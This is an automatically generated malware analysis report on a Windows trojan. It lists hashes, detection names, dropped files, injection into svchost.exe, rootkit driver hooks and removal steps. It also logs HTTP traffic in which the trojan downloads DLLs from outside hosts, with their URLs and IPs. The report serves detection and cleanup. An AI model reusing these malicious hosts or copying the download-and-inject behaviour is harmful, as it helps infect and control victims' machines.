HEUR:Trojan.Win32.Generic (Kaspersky), Gen:Variant.Zusy.189562 (B) (Emsisoft), Gen:Variant.Zusy.189562 (AdAware), Trojan.Win32.Delphi.FD, Trojan.Win32.Sasfis.FD, VirTool.Win32.DelfInject.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan, VirTool
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 28a66abbba0c025bb16c23a49e05c785
SHA1: 93e57e0e0e26f1f88733b138d898dd9b70fd2d09
SHA256: 59b5736b1d08741c35f2f518cdc7aaac2b3dbe2153eb8f451ca6f4d5d8fd96c6
SSDeep: 24576: /0wlANZpZmUJei4KDZb qhwO19/3BM57A7Wm05w/6a4wzt08:UmNZO7gFbhwaBU7mWm058J08
Size: 999936 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: PECompactV2X, PECompactv20, UPolyXv05_v6
Company: no certificate found
Created at: 2012-09-09 13:00:27
Analyzed on: Windows7 SP1 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
%original file name%.exe:3652
The Trojan injects its code into the following process(es):
svchost.exe:3884
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process %original file name%.exe:3652 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Windows\WuVaOIS.dll (12 bytes)
C:\ProgramData\gFThJOXu\svchost.exe (9754 bytes)
The Trojan deletes the following file(s):
C:\Windows\WuVaOIS.dll (0 bytes)
Registry activity
Dropped PE files
MD5 | File path |
---|---|
3b24050ce849ea9f15363027d11ada2b | c:\ProgramData\gFThJOXu\svchost.exe |
3b24050ce849ea9f15363027d11ada2b | c:\Users\All Users\gFThJOXu\svchost.exe |
158b710a2ce07e3a34e46118f2ad39f2 | c:\Windows\DFaqsb\GBhKYDvG.dll |
941f0ec0a5255964542529dde706f296 | c:\Windows\DFaqsb\ifqSYmg.dll |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
Using the driver "\DosDevices\C:\Windows\system32\147d3a\r82JCzanHAa.sys", the Trojan monitors the creation and termination of processes by installing a process notifier.
Using the driver "\DosDevices\C:\Windows\system32\147d3a\r82JCzanHAa.sys", the Trojan monitors the loading of executable images into memory by installing a load-image notifier.
Using the driver "\DosDevices\C:\Windows\system32\147d3a\r82JCzanHAa.sys", the Trojan monitors operations on the system registry by installing a registry notifier.
Propagation
Removals
Remove it with Ad-Aware
- Download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Scan a system with an anti-rootkit tool.
- Terminate malicious process(es) (How to End a Process With the Task Manager):
%original file name%.exe:3652
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
C:\Windows\WuVaOIS.dll (12 bytes)
C:\ProgramData\gFThJOXu\svchost.exe (9754 bytes)
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
CODE | 4096 | 1236992 | 989184 | 5.54503 | add7259d069c2588cedcb196d25d6fbe |
.rsrc | 1241088 | 12288 | 9728 | 4.42852 | 6676c143b55ed5405b8bceb81ae28187 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://www.58sky.com/index/getcfg?id=20297 | 119.97.143.41 |
hxxp://5636.ecoma.ourwebpic.com/d2/CDClient.dll | |
hxxp://5636.ecoma.ourwebpic.com/d2/x86.dll | |
hxxp://www.58sky.com/index/getcfg?id=3 | 119.97.143.41 |
hxxp://5636.ecoma.ourwebpic.com/ | |
hxxp://so.qh-lb.com/ | |
hxxp://cdn.sp.cdntip.com/ic.asp | |
hxxp://175.haodns123.cc/ | |
hxxp://175.haodns123.cc/css/style.css | |
hxxp://175.haodns123.cc/js/jscript_jquery-1.4.2.min.js | |
hxxp://175.haodns123.cc/js/jscript_jquery.faded.js | |
hxxp://175.haodns123.cc/images/top-ban.jpg | |
hxxp://175.haodns123.cc/ad.js | |
hxxp://www.175sf.com/js/jscript_jquery-1.4.2.min.js | 14.29.32.98 |
hxxp://www.ip138.com/ | 87.245.198.83 |
hxxp://www.175sf.com/ | 14.29.32.98 |
hxxp://www.175sf.com/js/jscript_jquery.faded.js | 14.29.32.98 |
hxxp://www.go890.com/d2/CDClient.dll | 87.245.198.83 |
hxxp://1212.ip138.com/ic.asp | 42.236.125.44 |
hxxp://www.175sf.com/images/top-ban.jpg | 14.29.32.98 |
hxxp://www.175sf.com/css/style.css | 14.29.32.98 |
hxxp://www.go890.com/d2/x86.dll | 87.245.198.83 |
www.haosou.com | 180.153.234.170 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /d2/CDClient.dll HTTP/1.1
Host: VVV.go890.com
Accept: text/html, */*
User-Agent: Mozilla/3.0 (compatible; Indy Library)
HTTP/1.1 200 OK
Date: Mon, 31 Oct 2016 19:47:33 GMT
Server: kangle/2.9.6
Last-Modified: Mon, 31 Oct 2016 07:09:49 GMT
Content-Type: application/octet-stream
Content-Length: 863232
Age: 1
X-Via: 1.1 db78:1 (Cdn Cache Server V2.0)
Connection: keep-alive
GET / HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: VVV.175sf.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 31 Oct 2016 22:06:21 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Location: hXXp://VVV.175sf.com/index.html
Last-Modified: Mon, 31 Oct 2016 11:05:03 GMT
Content-Encoding: gzip
GET /d2/x86.dll HTTP/1.1
Host: VVV.go890.com
Accept: text/html, */*
User-Agent: Mozilla/3.0 (compatible; Indy Library)
HTTP/1.1 200 OK
Date: Mon, 31 Oct 2016 19:47:36 GMT
Server: kangle/2.9.6
Last-Modified: Wed, 21 Sep 2016 07:08:16 GMT
Content-Type: application/octet-stream
Content-Length: 132608
Age: 1
X-Via: 1.1 db78:1 (Cdn Cache Server V2.0)
Connection: keep-alive
GET / HTTP/1.1
Host: VVV.ip138.com
Accept: text/html, */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
HTTP/1.1 200 OK
Date: Mon, 31 Oct 2016 03:42:55 GMT
Content-Length: 18658
Content-Type: text/html
Content-Location: hXXp://VVV.ip138.com/index.htm
Last-Modified: Thu, 27 Oct 2016 03:33:45 GMT
Accept-Ranges: bytes
ETag: "4a8df4eb230d21:446a"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Age: 66207
X-Via: 1.1 db77:5 (Cdn Cache Server V2.0)
Connection: keep-alive
GET /js/jscript_jquery-1.4.2.min.js HTTP/1.1
Accept: */*
Referer: hXXp://VVV.175sf.com/
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: VVV.175sf.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 31 Oct 2016 22:06:22 GMT
Content-Type: application/x-javascript
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Last-Modified: Tue, 19 Jul 2011 02:14:30 GMT
Content-Encoding: gzip
GET /js/jscript_jquery.faded.js HTTP/1.1
Accept: */*
Referer: hXXp://VVV.175sf.com/
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: VVV.175sf.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 31 Oct 2016 22:06:22 GMT
Content-Type: application/x-javascript
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Last-Modified: Tue, 19 Jul 2011 02:14:20 GMT
Content-Encoding: gzip
GET /images/top-ban.jpg HTTP/1.1
Accept: */*
Referer: hXXp://VVV.175sf.com/
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: VVV.175sf.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 31 Oct 2016 22:06:23 GMT
Content-Type: image/jpeg
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Last-Modified: Tue, 14 Jun 2016 07:38:00 GMT
Content-Encoding: gzip
GET /ic.asp HTTP/1.1
Host: 1212.ip138.com
Accept: text/html, */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Connection: keep-alive
Date: Mon, 31 Oct 2016 22:06:23 GMT
Content-Type: text/html
Content-Length: 219
X-Powered-By: ASP.NET
Set-Cookie: ASPSESSIONIDQQCADBBT=LDKBNLNDPEHJBOIGFEEMOIKD; path=/
X-Daa-Tunnel: hop_count=1
<html>..<head>..<meta http-equiv="content-type" content="text/html; charset=gb2312">..<title> ....IP.... </title>..</head>..<body style="margin:0px"><center>....IP....[194.242.96.218] ............</center></body></html>..
GET /index/getcfg?id=20297 HTTP/1.1
Host: VVV.58sky.com
Accept: text/html, */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/3.0 (compatible; Indy Library)
HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Mon, 31 Oct 2016 22:06:11 GMT
Content-Type: text/html;charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.5.27
Set-Cookie: PHPSESSID=8mnufegj6miu4d5l91jggmuur5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Encoding: gzip